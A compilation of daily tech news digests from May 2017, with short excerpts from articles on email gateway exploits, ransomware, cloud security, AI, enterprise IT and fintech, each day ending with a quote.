Daily Tech Digest - May 25, 2017

Split Tunnel SMTP Exploit Bypasses Email Security Gateways

The so-called Split Tunnel SMTP Exploit works against pretty much any email encryption device—virtual, hosted or in-house—that accepts inbound SMTP and there's very little anyone can do to stop it, according to the company. Attackers can use the exploit to inject any payload that supports MIME encoding including ransomware, macro viruses and password protected ZIP files. The exploit, says Vikas Singla, CEO of Securolytics, takes advantage of the fact that an email encryption appliance has a publicly accessible IP address and is able to receive and transfer emails. Such devices are typically deployed beyond the enterprise firewall and are often used in conjunction with an email security gateway. Singla says that during an engagement at a healthcare customer site Securolytics discovered an attacker could completely bypass the email security gateway by connecting directly to the encryption appliance.


Big Data versus money laundering: Machine learning, applications and regulation in finance

ML is efficient, but opaque: "It works, and it works well, but we do not exactly understand why or how." Although that has been said on deep learning, it applies more broadly for ML as well, and coming from experts in the field it is not something to be dismissed lightly. This may raise some philosophical questions, mostly having to do with the increasing feeling of being sidelined and not being able to keep up with technology, but there are also some very practical implications. As Mathew notes, whatever anti-MLA approach taken, getting results is not enough. It must also comply with a number of guidelines, ensuring for example there are no discriminations against certain groups of the population. The issue of algorithmic transparency is becoming increasingly understood and widely discussed, and there are many examples in which opaque algorithms embody all sorts of bias.


10 ways to protect your Windows computers against ransomware

With the recent WannaCry ransomware infection affecting users on an international scale, the stakes are extremely high for those who rely on technology to protect their data at all costs. This is especially true of critical systems, such as those that provide life-saving care in hospitals, infrastructure used to manage utilities, and information systems used in government services. .... Consideration must also be given to complying with any regulations that may exist specific to your industry. With that said, safeguards are merely that. The risk associated with malware infections is always present, as risk can't be eliminated. But applying multiple security applications as a layered solution provides comprehensive protection on several fronts to minimize the threat of a potential outbreak in accordance with best practices.


The Importance of Teaching Students About Cyber Security

As for teens and pre-teens, it may be a good idea to show them some real examples of Internet sharing gone wrong. Teens like to share what they are doing, who they are with, what they're wearing and many more aspects of their lives on social media. But they usually don't realize that what they post can be viewed by anyone – their teachers, their principal, their families. Even if their accounts are private, kids talk, and word gets around to the adults. And there are ways for strangers to hack right into their accounts and see those posts they thought were private. Even deleting a post is not as sound as it may seem, because once something goes up on the Internet, there are ways to dig it back up even if it's been deleted. Teens need to know that this can greatly affect their reputation now, and in the long run when it comes to getting into college and applying for jobs.


IT still needs the tried-and-true on-premises data center

As regions such as Africa and Asia focus on new data centers, more established data center regions such as the United States are seeing stagnation in new data center builds and more interest in colocation facilities. Over half of enterprise respondents to IDC's annual survey use colocation services. "At this point, a lot of the nonearly adopters are testing the waters of the colocation market," Quinn said. Among the other half of respondents, there's still a lot of uncertainty around colocation adoption. IT leaders still ask a variety of questions, said Quinn: How do we engage colocation providers? Which workloads should we migrate? And how secure is this going to be? Colocation providers must help customers answer these questions prior to the initial engagement, which can be a bit of a handholding process.


WannaCry Ransomware Cyberattack Raises Legal Issues

The firm can consider what specific steps can be taken to avoid or mitigate potential civil actions, including private rights of action or class actions regarding a cyber incident. Many states allow for a private right of action to be filed in order to recover damages. On cybersecurity matters, there has been substantial activity involving class actions. Engaging experienced counsel early after the cyber incident may help the firm recognize potential litigation, and counsel can recommend steps to anticipate and mitigate costly legal actions. Another important question involves whether and when to contact law enforcement. Federal authorities recommend that law enforcement be contacted when ransomware occurs.[6] The facts of each case must be carefully considered by the firm. Law enforcement will likely want to obtain relevant data about the cyber incident that is properly authenticated under chain of custody protocols.


Here's How Windows 10's Rapid Release Works & Looks

Pilot, Microsoft says, is the state of an upgrade's first four months, when enterprises should install it only in small-sized pilot programs. (Consumers running Windows 10 Home are always fed from the Pilot channel, and so are roped into testing the earliest versions.) After about four months, Microsoft -- in discussion, it claims, with software developers, hardware partners and customers -- declares an upgrade as fit for wider business deployment and thus flags it as Broad. In one example, Microsoft suggested multiple deployment "rings," or groups in an enterprise, with across-the-board upgrades beginning as soon as the Broad release was available. For 1709, that would be about four months after the September 2017 launch, or in January 2018. A second group, recommended Microsoft, would begin the upgrade process two weeks later. Your company might postpone that further or break the business into more than two Broad groups.


Understanding the benefits and threats when building an IoT strategy

By having critical infrastructure components, IoT is a potential target for national and industrial espionage, as well as denial of service and other types of attacks. Another major area of concern is privacy with the personal information that will potentially reside within networks, Big Data and the cloud is also a potential target for cyber attacks. IoT is still a technology in development, and that must me taken in consideration when evaluating its security needs and requirement. Many devices are connected to the Internet and sending data and information to the Cloud, and that will definitely increase. With the advent of contextual data sharing and autonomous machine actions, IoT will become the allocation of a virtual presence to a physical object, and these virtual presences will begin to interact and exchange contextual information.


82% of Databases Left Unencrypted in Public Cloud

The problem isn't in cloud providers failing to secure data centers, but in organizations failing to secure applications, content, systems, networks, and users that use the cloud infrastructure. "That is where people are not aware, or not investing the right resources," he continues. Researchers found of the 82% of databases left unencrypted in the public cloud, 31% were accepting inbound connection requests from the internet. More than half (51%) of network traffic in the public cloud is still on the default web port (port 80) for receiving unencrypted traffic. Nearly all (93%) public cloud resources have no outbound firewall rule, says Badhwar. "You need to have control at the network, configuration, and user layers so it's hard for someone to get in, and harder for them to take your data out," Badhwar emphasizes


Identity management the new 'perimeter' for hospital cybersecurity

“Ten or 12 years ago, we looked at what it would have taken to buy an identity platform, and it would have taken six or seven different commercial software packages to cobble together a sufficient platform,” Houston said. “Had we done that, we would have replaced all of them by today, either because they no longer would be on the market or because they would be out of date.” Houston added that the most important capabilities of an identity management platform, whether proprietary like UPMC’s or purchased from a vendor, include the ability to understand who your users are and ultimately run analytics on their activities.  “We link into our human resources system, our physician credentialing system, we know when people come into our employment, when they change positions, when they leave,” Houston said. “Who they are, where they report to, where they are in the organization, we have a lot of understanding of who these people are.



Quote for the day:


"Simplicity is a great virtue but it requires hard work to achieve it and education to appreciate it." -- Edsger W. Dijkstra


Daily Tech Digest - May 24, 2017

Identity, authentication and authorisation becoming risk-led

A risk-led approach means organisations can automatically adjust the number of authentication factors required between one and seven, depending on the context and in line with best practice guidelines. In addition to continuous identity assurance and user authentication their way, RSA is also addressing organisations’ need to secure legacy applications. “By putting SecurID on a unified platform, businesses can access cloud applications and on-premise applications in the same place with the convenience of a single sign-on, but without using [the dangerous approach of] synchronising identities in the cloud,” said Darisi. “We provide a 360-degree view of an individual’s identity through our portal – of the person’s role, location and devices - but we do not merge the identity stores,” he said.


How to fix the broken coding interview

Mimicking the real job of a coder in an interview is enormously difficult, however, particularly when it comes to achieving context. Even in a relatively new codebase it can take months for a programmer to gain sufficient context to be able to contribute at a decent pace. In the past employers have tried to cater for this in their own interview process by having candidates work with a much smaller sample codebase. But companies like Hired have learned even a few hundred lines of code across a handful of files can be overwhelming for a one-hour session. As a result, it is necessary to keep the tasks quite simple, meaning good candidates didn’t have the chance to properly shine. One way to overcome this is taking that same concept of a smaller codebase but sending it to candidates ahead of time.


New Tool Tallies Your Big Data Debt

As the big data era emerged, new technologies were created to support modern data structures and to deliver to the always-connected user," he added. "These newer systems have an important role in building modern applications, however they produce data that is fundamentally incompatible with existing analytical infrastructures including data warehouses, ETL, BI and data science systems like R and Python. As a result, many organizations are collecting significant data debt." Dremio's new Big Data Debt Calculator is intended to help organizations get their arms around this unplanned debt. Dremio says it gives recommendations for minimizing debt, strategies for paying it down and ensuring it remains within acceptable bounds.


How banks can learn the lessons of BlackBerry

With regulation forcing banks to open up their technology to FinTech firms, startups and other financial service providers, consumers are becoming less reliant on providers of traditional financial services. The idea that one institution will manage all financial services for one customer will no longer be the most viable or the expected model. Open banking creates a new relationship between banks and customers. It requires banks to adopt a customer centric and data centric view on how they do business. In this emerging model, data and services become valuable commodities. To extract value, banks must have the appropriate core-technology and infrastructure in place. It requires a good API governance structure that must include: standards, management policies, data access and statistics, and development processes.


Multi-cloud is a messy reality, but there's hope

While each of the clouds is a solid choice for machine learning, for example, Google generally gets the nod as the frontrunner. Many enterprises will turn to Google for machine learning, AWS for Lambda, Microsoft Azure to modernize their legacy applications, and so on. Such cloud differentiation makes the likelihood of multi-cloud management ever harder. As cloud luminary Bernard Golden told me, "While it appears attractive to use a management tool that encapsulates the individual cloud providers and provides a single management framework, since it promises to reduce costs by amortizing training and employee costs across a greater breadth of applications, in practice it typically means using a lowest-common denominator application management approach, which often forfeits use of functionality that resides within a provider's IaaS/PaaS offerings."


In Search of an Rx for Enterprise Security Fatigue

The security fatigue phenomenon affects consumers and enterprises alike. According to the National Institute of Standards and Technology (NIST), security fatigue is also causing consumers to make poor security decisions, such as reusing the same password across all online accounts. But what enterprises can glean from this report is NIST's suggestions to combat security fatigue, including limiting the number of security decisions that users need to make; making it simple for users to choose the right security action; and designing for consistent decision making whenever possible. But up until a few years ago, many enterprise networks in Fortune 500 companies didn't have the ability to identify a compromised network or subnet in a timely manner. Now, the sheer amount of security measures used to detect a network compromise can create this fatigue. Without knowing what to pay attention to, identifying an inside threat is like trying to find a needle in a haystack.


Why Ansible Has Become The Debops Darling For Software Automation

One reason it has gained momentum since being acquired by Red Hat may have been the acquisition itself, according to Paul Delory, a research director at Gartner. "We definitely have seen a bump in interest since the acquisition by Red Hat, because it now has more credibility in the enterprise," he says. Part of the reason for this is that there was a perception in the software development and devops community that Ansible's support offering was not as good as that of Puppet or Chef. But under Red Hat's ownership this support gap has been closed, he says. "Support is important to enterprises, and the quality of support available is of critical importance," he adds. But there's more to Ansible's popularity than the availability of decent support options, vital though those options are to enterprise customers.


The Rise Of Toxic Data

Data growth raced ahead while information security fell behind, and the collateral damage is making headlines. Data breaches like those that happened to Sony, Mossack Fonseca, the U.S. Office of Personnel Management (OPM) and the Democratic National Committee (DNC) are practically daily occurrences. Instead of increasing revenues or furthering goals, stolen files and emails disrupt and subvert plans. If an organization stores valuable data (and most store more than they realize), someone will try to steal it. Your next breach may be perpetrated by someone who has never heard of you; ransomware, a form of file extortion, is now a $1 billion business. Worldwide cybersecurity spending is expected to exceed $1 trillion over the next five years, according to Cybersecurity Ventures. So why do organizations still have so many breaches?


Google raises heat on Microsoft with new Chrome bundle for enterprises

"Every couple of years, Google makes noise about Chrome in the enterprise," said Gary Schare, president of Browsium, a maker of browser management tools. Schare was formerly the head of project management for Microsoft's Internet Explorer (IE). "This looks like Google is trying to make Chrome a better citizen in the enterprise." Schare applauded the group policy templates, noting that because Microsoft's own browsers, IE as well as Windows 10's Edge, have traditionally been the best equipped for enterprise management, any help from Google on Chrome would be welcome. The LSB add-on has long been available from the Chrome Web Store, Google's authorized mart for browser extensions. Once configured by company IT administrators, LSB will automatically open IE11 when links clicked within Chrome lead to websites, web services or web apps requiring, for example, an ActiveX control or Java, neither of which Google's browser supports.


With Billions Spent on Cybersecurity, Why Are Problems Getting Worse?

Despite what people generally think, there are surprisingly few regulations that force companies to take reasonable steps to protect their data. Even in areas such as healthcare, regulations like the Health Insurance Portability and Accountability Act lack clarity and are insufficiently enforced. In 2016, more than 27.3 million patient records were breached, but despite this, the Office for Civil Rights (the healthcare security and privacy regulator) settled alleged HIPAA violations with only 12 healthcare organizations. Outside of areas like healthcare, finance, government, etc., most federal security enforcement has defaulted to the Federal Trade Commission, which uses an arcane statute of the Federal Trade Commission Act that prohibits unfair or deceptive practices in the marketplace. This means that only the most egregious violations are penalized, leaving implementation of effective cybersecurity to the discretion of most business leaders.



Quote for the day:


“The electric light bulb did not come from the continuous improvement of candles.” -- Oren Hariri


Daily Tech Digest - May 22, 2017

Don't worry CIOs: You still control tech spending

"The growing tech-savviness of business leaders and the wider availability of cloud solutions does mean that business leaders are playing a bigger role in the front end of this process," Bartels says. But the persistence of licensed software, the growing adoption of cloud as a replacement for licensed software, and challenges of implementing and optimizing solutions mean that CIOs and tech management teams still play a dominant role in overall tech purchases. Moreover, CIOs are procuring software-as-a-service (SaaS) solutions — the top shadow IT target for business leaders — more than ever as it allows them to meet business requirements. “That becomes a mechanism to manage demand,” Bartels says.  CompTIA just announced similar findings from a survey of 675 U.S. businesses in its report, “Considering the New IT Buyer."


Digital India must protect itself with well-crafted cloud security strategy

As the government's cloud strategy takes shape, this is the time to move over to security in the cloud paradigm. It will require a radical reassessment and revamping of existing security provisions, because a move to the cloud changes the technology landscape quite drastically. The new paradigm must incorporate the spirit of the legacy security provisions, but requires much more sophistication to secure a hybrid cloud setup. Furthermore, it is critical that this broad-gauged security policy be executed uniformly across all components of the hybrid cloud. This is where cloud security gateways and security brokers come into action. Rather than leave it to individual systems in the cloud to take care of their own security (as is the case in the legacy setup), a cloud security broker can monitor and defend the entire cloud and all the systems within. Security across all the different systems is addressed holistically, regardless of where the systems may reside.


Digital transformation: MIT's Westerman shares new lessons

Successful digital transformation is like a caterpillar turning into a butterfly. It’s still the same organism, but it now has superpowers. Unfortunately, when it comes to digital transformation, many senior execs aren’t thinking about butterflies. They’re just thinking about fast caterpillars. And it’s hard to keep up with your competitors if you’re crawling ahead while they can fly. ... It would be nice to think that companies and governments would be responsible for finding new roles for the people who are displaced by technology. But more realistically, people need to be responsible for their own professional development. Stay abreast of what is happening with industries and technologies. If you’re in a job that will die soon, do what you can to shift to another. Hopefully, our society will find ways to help people who lose in the race against machines.


HP'S Spectre X2 May Be The Surface Pro Killer We've Been Waiting For

Going outside the box, HP has seriously revamped the Spectre x2's screen to 12.3-inch diagonal size and 3000x2000 resolution screen. Compared to the first gen Spectre x2's 16:9, 1920x1080 panel, this new model has the same aspect ratio as MIcrosoft's Surface Pro 4. The newer screen is IPS and brighter, too, with a maximum of 450 nits, slightly better than the Surface Pro 4 panel's spec. HP has also cloned the Surface Pro 4's pen tech. The original Spectre x2 used a Wacom-based pen, while the 2nd gen replaces Wacom for N-trig, which Microsoft uses for its own Surface Pen. Microsoft even bought N-trig. The N-trig pen's main appeal to PC makers is its ability to use the capacitive touch layer to sense the pen. Wacom-based devices require a separate digitizer, which adds thickness to the screen.


How A Common Language For Cyber Threats Boosts Security

Orchestration and automation may be the most significant advantages governments obtain when they adopt standard threat information formats. It’s no secret there is a cybersecurity talent shortage. To manage a growing volume of increasingly sophisticated threats, it is critical to have infrastructure and security tools that enable quick, automated and synchronized responses without human intervention. The goal of Open C2 and other groups work is to expand the development of orchestration software and standardized command and control languages. Central to the OpenC2 movement’s platform is the idea that standardizing language between machines enables rapid response to shared threat intelligence. As the OpenC2 forum states, “Future defenses will require the sharing of indicators, the coordination of responses between domains, synchronization of cyber defense mechanisms and automated actions at machine speed against current and pending attacks.”


How the CISO moved from the basement to the boardroom

If the CISO is overwhelmed with projects, it can be helpful to determine which departments you are serving, who the stakeholders are, and what is critical to them, Hayslip said. That will help you create a more narrow list of issues to tackle. It's often wise to start with cyber hygiene, he added: If you have basic security policies and patch management, antivirus, and firewalls in place, updated, and managed, it builds a strong foundation for your organization's cyber health. CISOs also have an opportunity to redefine their role as a business strategist during the digital transformation, Pollard said. To prove their value, they should spend time mapping the firm's technology touchpoints, foster security champions across the company, and get involved with customer-facing activities like product design and development, he added.


How Cybersecurity Benefits from Hackers

To put it simply, many of those who identify themselves as “hackers” are very talented programmers. The creators of some of the most well-known software are self-proclaimed hackers. Among these hackers-turned-programmers are Mark Zuckerburg, founder of Facebook; Linus Torvalds, the creator of Linux; and Tim Berners-Lee, one of the driving forces behind the creation of the World Wide Web. Often, these programmers will seek a solution that doesn’t involve working with one of the entrenched proprietary software companies. Instead, they will create open-source projects, where the source code is made publicly available. The programming community, including several who identify as hackers, work together to produce software solutions that is available to everyone. Even people who never use open-source software benefit from these projects, as the public community will often create new innovations that the proprietary companies either use for inspiration or simply copy outright.


Google, A.I. and the rise of the super-sensor

Here's a simplified version of how such a sensor might work in a warehouse setting. You plug in one or a few super sensors. Then somebody uses a forklift. The resulting vibration, sound, heat and movement detected by the super sensor generate patterns of data that are fed into the system. You can identify this as "forklift in operation." (Further tweaking might determine not only when a forklift is in use, but where it is, how fast it's moving, how much weight it's carrying and other data.) You can then program next-level applications that turns on a warning light when the forklifts are moving, calculates wear-and-tear on forklift equipment or detects unauthorized operation of forklifts.The output from these "synthetic sensors" can be used by developers to create any kind of application necessary, and applied to semantic systems for monitoring just about anything.


Lessons From Women IT Leaders On How To Transcend The Middle Order

“Women must make themselves visible for the right skills and projects, and to the right people if they want to advance into senior leadership,” says Ghosh. Women, especially in enterprise IT, says Ghosh, must be vocal about their goals and ambitions, and this is one way they can deal with implicit bias. “The other thing is that even organizations must acknowledge the bias,” says Dar. “Consciously or unconsciously, we are discriminated against and when these things come to light they have to be dealt with the same importance that any other labour matter or such would be dealt with. Just pushing it under the rug does not work anymore”, says Dar. Her company, Godfrey Phillips runs awareness sessions for employees, “and that is something all companies should run on a timely basis,” she says. Even at organizations, Vijay says, it is very important to introduce programs that are aimed at increasing the representation of women in IT leadership positions.


Companies Ramp Up Recruting Veterans As Cybesecurity Urgency Grows

Like most new hires, veterans in the private sector must navigate a culture that’s vastly different from military life. When Navy veteran Dana Hawkins took his first private sector job as a contractor, “just getting used to the lack of process” at some smaller companies compared to the stringent cybersecurity processes of the military was a big challenge. Hawkins is now director of security services at Proficio. Other veterans find it challenging to work with a virtual team after years of direct contact with leaders. “It takes a while for our veterans to get used to it,” Stoner says. To smooth the transition, PwC assigns veteran mentors to help new hires assimilate into the firm. Stoner, an Army veteran and reservist himself, finds that military “athletes” – those veterans withleadership, self-discipline and a goal-oriented approach– make the best transition to private sector cybersecurity careers – and there’s plenty of room for more.



Quote for the day:


"Careers, like rockets, don't always take off on schedule. The key is to keep working the engines." -- Gary Sinise


Daily Tech Digest - May 21, 2017

Using ‘Faked’ Data is Key to Allaying Big Data Privacy Concerns

The MIT researchers, led by Kalyan Veeramachaneni, proposed a concept they call the Synthetic Data Vault (SDV). This describes a machine learning system that creates artificial data from an original data set. The goal is to be able to use the data to test algorithms and analytical models without any association to the organisation involved. He succinctly states that, “In a way, we are using machine learning to enable machine learning,” The SDV achieves this using a machine learning algorithm called “recursive conditional parameter aggregation” which exploits the hierarchical organisation of the data and captures the correlations between multiple fields to produce a multivariate model of the data. The system learns the model and subsequently produces an entire database of synthetic data. To test the SDV, synthetic data generation for five different public datasets was performed using anti debugging techniques.


AI Platforms: How to Make the Smart Choice

Companies will in all likelihood build an infrastructure that uses more than one platform. The company specific business technology platform can easily become a platform of technology platforms. If these platforms, and the applications on top of them, do not play nicely the company will have a hard time to provide customers with positive engagements that leave a good experience. Instead, there will be inconsistent and duplication of data, broken processes, hence frustrated employees and customers; in summary poor experiences for everybody involved, leading to poor experiences. And not concentrating on good experiences leaves companies with missed opportunities, as studies like this one show. ... If there already are platform based business applications available then it is a good option to look at what the underlying AI platform of the vendor is offering, always keeping the answer to the question “What experiences do you want to deliver?” in mind.


How to Handle the Data Deluge and Drive Business Success

The challenge for organizations is pulling all the critical data together into a coherent view of the business that allows them to confidently act on well-founded plans. Increasingly, CFOs are being tasked with not only understanding and communicating financial results but also with helping the organization understand the operational drivers behind them, requiring a more detailed analysis of business KPIs, many of which are non-financial. In fact, a recent (Adaptive Insights CFO Indicator Q3 2016) report found that 76 percent of CFOs are tracking non-financial KPIs, which involves greater collaboration across the organization and data integration to create a holistic view of the business. While it is positive that so many CFOs are taking this step to become a more strategic advisor, this influx of new data can pose a problem when it comes to consolidation.


Harnessing the Secret Structure of Innovation

Reassuringly, many innovators already have the tools to do so: Companies routinely re-engineer competitors’ products, analyze the patent landscape, and conduct interviews with technology experts to guide their operational decisions. We believe innovators can and should also use these same tools and information to guide their strategy by methodically measuring the evolution of product complexity in their space. This requires developing a taxonomy of components by sampling competitors’ products and dissecting not only physical components but also intangible ones like process innovations or business model choices. While we are not aware of any company that is yet explicitly doing this, we do see that many startups implicitly follow this logic by shifting from an impatient minimum viable product (MVP) logic to more patient innovation centered on more complex designs once cash flow and funding have been secured and the space begins to mature.


Data protection is not just an IT issue

Independent Cybersecurity Expert, Dr Jessica Barker said: “With so many data breaches hitting the headlines, there can be a sense of defeatism among some organisations. Breaches are seen as inevitable so some organisations question the value of spending on security when it won’t make them 100% secure. However, this research has found that investing in security helps protect the organisation when even the worst happens, as companies with a strong security posture experience much quicker stock price recovery than those with a poor security posture following a data breach.” “In this past year alone we’ve seen high-profile data breaches, such as Yahoo and TalkTalk, experience the significant consequences that a breach can have on shareholder value and brand reputation,” said Bill Mann, senior vice president of products and chief product officer, Centrify.


A More Practical Approach to Encrypting Data in Motion

RSA and Elliptic Curve Cryptography are two classes of algorithms that achieve these characteristics. The keys associated with these algorithms can be serialized and encoded in special files called X.509 certificates. Certificates contain a ton of other information like names, network addresses, and dates. When people refer to certificates, they usually are referring to X.509 certificates that contain public keys. Data (like certificates) can be digitally signed. Digital signatures are encrypted hashes. A good hash function is one that’s hard to reverse and not prone to collisions. If you apply a good hash function to a message, the result of the function does not reveal anything about the original message. Further, a good hash function applied to any two messages are not likely to have the same resultant value (also called a collision).


Graph databases and RDF: It's a family affair

Should we just dismiss RDF as impractical and RDF stores as inferior software delivered by academics and move on? Maybe not so fast. There are RDF vendors who are entirely professional about what they do, and RDF does have certain things to offer that are not there in other graph data models. We had a discussion with Vassil Momtchev, GraphDB product owner at Ontotext, about the benefits and use cases of RDF. Ontotext's legacy is in text mining algorithms, however these days it's mostly known for GraphDB, its RDF Graph database engine. "Our text mining is backed by a complex semantic network to represent background and extracted knowledge. Back in 2006, we found that none of the existing RDF databases were able to match our requirements for a highly scalable database. This was how GraphDB started," says Momtchev.


Digital Currencies Like Bitcoin and Ethereum are Booming

The ethereum dream. Just by some code that no one can stop, we’ll bring back money to the people. Not because we dislike banks or governments, but because they too will see it is better for the regulator of the free market, money, itself to be regulated by the free market. That statement isn’t a hypothesis, but the insight of Hayek, a Nobel prize winner who spent his life studying money. So the foundations of this space are built on strong and mainstream grounds, not fringe thoughts as many were led to believe in the previous years. Its walls are futuristic in architecture. We are digitizing money, making it dynamic, turning it into code, while giving it a very primitive level of intelligence in that we can tell it to do things and it does do so. The applications only imagination can constrain and the benefits, for poor or rich, banks and governments or the people, will probably be very considerable. To the point where we might actually get those flying cars in our own lifetime.


IoT and Blockchain Technology Collide in the Payments Industry

The collision between the IoT and blockchain worlds portends some important payments industry developments around the efficient tracking of device payment history, all supported by a ledger of secure data exchanges among devices, web systems and users. Further, this technological convergence also shows promise in terms of the use of smart devices that are programmed to conduct a variety of transactions such as the automatic issuance of invoices and payments.  Dan Loomis, vice president and director of mobile product management at the business and financial software firm Intuit, is firmly entrenched in this evolving IoT/blockchain conversation through his work in creating payment experiences for businesses that operate on a global scale, and brought this expertise to the TRANSACT panel discussion.


Under The Hood With the JVM's Automatic Resource Management

The finalize() mechanism is an attempt to provide automatic resource management, in a similar way to the RAII (Resource Acquisition Is Initialisation) pattern from C++ and similar languages. In that pattern, a destructor method (known as finalize() in Java) is provided, to enable automatic cleanup, and release of resources when the object is destroyed. The basic use case for this is fairly simple - when an object is created, it takes ownership of some resource, and the object’s ownership of that resource persists for the lifetime of the object. Then, when the object dies, the ownership of the resource is automatically relinquished. Let’s look at a quick simple C++ example that shows how to put an RAII wrapper around C-style file I/O. The core of this technique is that the object destructor method (denoted with a ~ at the start of a method named the same as the class) is used for cleanup:


10 Free or Low-Cost Security Tools

While free tools sound great, their usefulness varies from business to business. For some organizations, they are helpful means of solving small problems. For others, they are too "siloed" to be effective. "It depends on the environment," says Travis Farral, director of security strategy at Anomali, which is behind the Staxx free threat intelligence tool. "Some are against major deployment of anything open-source that doesn’t have a company behind it, for support or liability issues." Because many free and low-cost tools are designed for specific purposes, they often require advanced technical expertise. Several major businesses use a combination of major enterprise tools and FOSS utilities because they have the staff to support them. For organizations with less staff, siloed tools require security practitioners to become systems integrators because they need to have the solutions work together, says Lee Weiner.



Quote for the day:


"Power concedes nothing without a demand. It never did and it never will." -- Frederick Douglass


Daily Tech Digest - May 20, 2017

Ransomware Rocks Endpoint Security Concerns

"The larger companies are strapped with so many layers of protection that it will take more time to figure out where AI fits in the stack, but mid-market to smaller enterprises with 150,000 to 200,000 nodes and below can adopt cutting-edge technology more quickly," McClure says. IDC's Westervelt notes that although many endpoint startups have launched out of the gate with signature-free detection technology that was based more on users' behavior, many are now adding signature-based detection engines to their products. "The vast majority of threats are known threats, so why put extra pressure on your sandbox" to test potentially malicious software based on its behavior, Westervelt says. And in the meantime, traditional signature-based anti-virus vendors have added signature-free security software to their offerings. As a result, Westervelt says, there is less and less differentiation between new and shiny startups and the old guard.


Google Researchers Are Teaching Their AI to Build Its Own, More Powerful AI

"The way it works is we take a set of candidate neural nets, think of these as little baby neural nets, and we actually use a neural net to iterate through them until we arrive at the best neural net," explains Pichai. That process is called reinforcement learning, where computers can link trial and error with some kind of reward, just like teaching a dog new tricks. It takes a massive amount of computational power to do, but Google's hardware is now getting to the stage where one neural net can analyse another. Neural nets usually take an expert team of scientists and engineers a significant amount of time to put together, but thanks to AutoML, almost anyone will be able to build AI systems to tackle whatever tasks they like. "We hope AutoML will take an ability that a few PhDs have today and will make it possible in three to five years for hundreds of thousands of developers to design new neural nets for their particular needs," Pichai writes in a blog post.


Indian IT's planned layoffs give a glimpse of the bloodbath ahead

It may not be the most original declaration but sometimes detective work of this kind does have its advantages in exposing the rot that actually lurks beneath the sheets. Lakshmikanth's reading of the McKinsey report mirrors what many in the industry have been raising alarms this year about. India CEO of French IT Services CapGemini said earlier this year, "I am not very pessimistic, but it is a challenging task and I tend to believe that 60-65 percent [of Indian IT workers] are just not trainable," he said. "Probably, India will witness the largest unemployment in the middle level to senior level," he added. A more fundamental problem is the lack of real skills amongst most of India's engineering graduates. According to employment solutions company Aspiring Minds, a well-known institution that regularly tracks the worth of college graduates, a staggering 80 percent of engineers in India don't possess skills that can make them employable.


Currency is Under Attack. Diversifying Your Funds is Smarter Than Ever

You just never know what is going to happen next, so diversifying your currency can help manage your risk and increase your chances of survival should something go wrong. Plastic can be very secure for the consumer since there are protections against fraud, but it is costly for merchants in transaction fees and fraudulent charges. The downside is that all your money is in a bank where you can't get to it in a crisis and if the FDIC collapses you may have no recourse to get that money back. Cryptocurrency, like Bitcoin and Ethereum, doesn't rely on central banking, so there's a lot less chance they will open you up to identity theft. The problem is that if it is stolen, you can never get it back. Also because of its untraceable nature, it is often used in crimes.


Uber Freight Is the First Step to Automating Away Truckers

Much like the taxi service before it, Uber’s promise here is to remove friction from the current system. In a blog post announcing the new service, the firm bleats about how drivers will be able to pick up jobs with a simple search and some button presses, rather than spending “several hours and multiple phone calls” trying to achieve the same end in the past. ... But there is a larger narrative at play here. Uber’s move into shipping came after it acquired the autonomous truck company Otto last summer. And that sector is maturing quickly: while the trucks make use of similar technology to that being used by the autonomous cars being developed by Uber and Waymo for robotic taxi fleets, they also only have to contended with highways. That's far easier than inner-city driving.


Global banking technology overview

If banks don’t rise to the challenge, there are many FinTechs waiting to nibble away at their business. For instance, Caxton is a company that uses hybrid blockchain and core banking-type technology for foreign exchange (FX) end uses. Its CTO, Russell Stather, is convinced that smart contracts and DLT will disrupt the commercial banking environment serving corporate treasurers. “Smart contracts allow you to move an asset with multiparty involvement in a single transaction, which makes it cheaper, quicker and traceable end-to-end,” he says. The key benefit for a payment or trade finance end use is that not everyone in the chain is taking a transaction fee anymore, as blockchains – unlike correspondent banking ones – are fast, irrefutable and traceable. Settlement mechanisms and structures for investment banks could also easily be disrupted – or improved – by DLT.


Protect your enterprise data using Windows Information Protection (WIP)

Unfortunately, data loss prevention systems have their own problems. For example, the more detailed the rule set, the more false positives are created, leading employees to believe that the rules slow down their work and need to be bypassed in order to remain productive, potentially leading to data being incorrectly blocked or improperly released. Another major problem is that data loss prevention systems must be widely implemented to be effective. For example, if your company uses a data loss prevention system for email, but not for file shares or document storage, you might find that your data leaks through the unprotected channels. But perhaps the biggest problem with data loss preventions systems is that it provides a jarring experience that interrupts the employees’ natural workflow by stopping some operations while allowing others


What will the ‘mega security breach’ of the future look like?

The mega breach of the future could take on a variety of different shapes and guises. Douglas Crawford, Cyber Security Expert at BestVPN.com imagines what it might be like if a criminal got hold of a lot of banking passwords. “The economic chaos caused could, in addition to bankrupting potentially millions of individuals, destroy banks and banking systems, create global economic depression, and even bring down governments,” he says. The interesting thing about this situation is it could arise from a variety of different motivations. Yet Chad Schamberger, Director of Engineering at VirtualArmour believes that mega breach of the future “will be driven to affect a decision, a political election, a financial outcome, or the intent to cause mass chaos across a population. Not necessarily to gather sellable assets but intended to expose the attack surface that has developed by introducing more and more poorly develop connected devices (IoT).”


Supercomputing as a Service comes to the cloud with new Cray partnership

The first solution to come from the partnership will focus on the life sciences industry, and will feature the Cray Urikia-GX system, a complete, pre-integrated hardware-software solution. It also includes the Cray Graph Engine, which includes pattern-matching that takes advantage of the scalable parallelization and performance of the platform, according to the release. "The Cray Urika-GX system is the first agile analytics platform that fuses supercomputing abilities with open enterprise standards to provide an unprecedented combination of versatility and speed for high-frequency insights, tailor-made for life sciences research and discovery," the press release stated. Cray and Markley plan to quickly expand their offerings to include Cray's full line of infrastructure solutions.


The Enterprise Architecture Problem

In IT (Information Technology) most of it is commodity. Buying these commodities may, at most, get you what everyone else already has. Forget analyzing performance improvement here, there is little of it, so emphasize cost reduction, enterprise wide purchase agreements, and minimizing security vulnerability or TCO by restricting brands to those tested and approved. The real key lies in producing some enterprise IT that produces marked improvement in your business processes. If those are the same business processes everyone else uses, benchmarked against best practices elsewhere, you can buy it as a COTS (Off the Shelf) product and tweak it a bit. However the best of all is the automation of processes that only you have, completely custom. You will have these special processes either because you do business differently (differentiation) or because only you are in this business.



Quote for the day:


"Mistakes should be examined, learned from, and discarded; not dwelled upon and stored." -- Tim Fargo